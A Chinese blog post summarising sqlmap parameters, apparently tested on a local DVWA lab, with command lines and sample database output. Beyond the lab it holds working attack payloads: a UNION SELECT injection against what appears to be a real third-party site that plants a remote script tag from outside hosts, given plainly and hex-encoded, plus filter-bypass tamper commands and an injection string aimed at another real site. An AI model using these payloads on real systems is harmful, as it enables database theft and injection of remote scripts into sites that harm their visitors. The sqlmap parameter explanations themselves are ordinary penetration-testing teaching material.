www.xiahuhu.cn
关注网络安全

SQL常用参数总结

一、环境:wamp+dvwa1.07(本地测试环境)

注入点:http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#  参数id上面存在注入
 sudo sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#"; --cookie="security=low; PHPSESSID=qge9s29bf5d0540vlr4qf0vtu0" -p id --string="First name" -b

二、利用SQLMAP绕过防注入:

sqlmap.py -u http://172.16.15.55:808/evnews/news.php?id=10 -v 3 --dbms "mysql" --technique U -p id --batch  --tamper "space2morehash.py" --dbs
1、SQLinject with javascript:
<script src='http://www.mlhotels.com/upload/sql.js'></script>;
0x3C736372697074207372633D27687474703A2F2F7777772E6D6C686F74656C732E636F6D2F75706C6F61642F73716C2E6A73273E3C2F7363726970743E
<script src='http://www.mlhotels.com/upload/sql.js'></script>;
0x3C736372697074207372633D27687474703A2F2F7777772E6D6C686F74656C732E636F6D2F75706C6F61642F73716C2E6A73273E3C2F7363726970743E
<script src='http://www.zzbfsoft.com/js/sql.js'></script>;
0x3C736372697074207372633D27687474703A2F2F7777772E7A7A6266736F66742E636F6D2F6A732F73716C2E6A73273E3C2F7363726970743E
 http://www.science-art.com.cn/article.php?id=-2910 UNION SELECT 1,2,3,4,5,6,concat((0x3C736372697074207372633D27687474703A2F2F7777772E7A7A6266736F66742E636F6D2F6A732F73716C2E6A73273E3C2F7363726970743E)),8,9
0x<script src='http://www.zzbfsoft.com/js/sql.js'></script>
concat((<script src='http://www.zzbfsoft.com/js/sql.js'></script>))
2、–level 2 使用级别3测试—–使sqlmap支持cookie注入
更改sqlmap的测试级别,当 –level >=2 的时候,sqlmap将检测 cookie里面的参数。。。
(1)-u 或者 –url 指定目标地址,例如
-u "http://www.waitalone.cn/sqlinject.php?id=1 或者--url="http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#";
(2)–cookie 指定目标所需要的cookie值

如果目标地址需要登陆以后才可以注入的,你可以登陆以后使用javascript:alert(document.cookie);来得到当前会话的cookie信息

例如 –cookie=”security=low; PHPSESSID=qge9s29bf5d0540vlr4qf0vtu0″

 

(3)-p 指定注入点参数

当URL中有多个参数的时候,比如id=1&type=test的时候,你可以手动指定注入参数。例如 -p id

* 指定SQL注入语句位置,可以进行伪静态注入。例如:

sqlmap.py -u "http://target.tld/id1/1*/id2/2";   http://www.gzcity.com/jiaoyou.php?pid=1'; or @`'` * or @`'` and '1'='1
(4)–string 指定页面关键字

当使用sqlmap对注入点进行测试时,如果确定是注入但是sqlmap识别不出来的时候请手动指定页面关键字:

例如 –string=”First name”

 

(5)-b 显示banner信息

针对此例 显示的是数据库的版本号

banner:    ‘5.5.8-log’

 

(6)–dbs 显示数据库

显示结果:

[16:21:42] [INFO] fetching database names
available databases [6]:
[*] dedecms
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

 

1 2 3
赞(1) 打赏
未经允许不得转载:花生米's Blog » SQL常用参数总结
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏